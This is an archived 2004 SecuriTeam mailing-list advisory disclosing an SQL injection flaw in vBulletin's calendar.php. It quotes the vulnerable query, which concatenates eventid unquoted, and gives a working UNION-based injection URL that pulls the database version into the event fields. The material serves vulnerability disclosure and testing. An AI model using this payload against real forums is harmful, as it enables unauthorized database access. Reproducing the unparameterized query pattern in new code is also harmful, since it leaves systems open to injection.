[UNIX] vBulletin Forum calendar.php SQL Injection

From: SecuriTeam (support_at_securiteam.com)
Date: 01/07/04

  • Next message: SecuriTeam: "[NEWS] Multiple Payload Handling Flaws in ISAKMPd (Continued)" 
    To: list@securiteam.com
Date: 7 Jan 2004 16:51:46 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      vBulletin Forum calendar.php SQL Injection
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.vbulletin.com/> vBulletin is "a commonly used web forum
    system written in PHP. One of its key features is use of templates, which
    allow the board administrator to dynamically modify the look of the
    board". A vulnerability calendar.php allows remote attackers to insert
    malicious SQL statements into the existing SQL statement used by the PHP
    file.

    DETAILS

    Vulnerable code:
    -------- Cut from line 585 in calendar.php ----------
    else if ($action == "edit")
    {
          $eventinfo = $DB_site->query_first("SELECT allowsmilies, public,
    userid, eventdate, event, subject FROM calendar_events WHERE eventid =
    $eventid");
    -----------------------------------------------------

    If the MySQL version is greater than 4.00, a UNION attack could be used.

    Exploit:
    The following exploit code can be used to test your system:
    http://www.site.com/phorum/calendar.php?s=&action=edit&eventid=14 union
    (SELECT allowsmilies, public, userid, '0000-0-0', version(), userid FROM
    calendar_events WHERE eventid = 14) order by eventdate

    (14 is the eventid of your added event)

    The subject and event field will show the result.

    The query_first function will only return the first row of the query
    result, so make sure it returns the one you want.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:a1476854@hotmail.com>
    Qianwei Hu.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Multiple Payload Handling Flaws in ISAKMPd (Continued)"

    Relevant Pages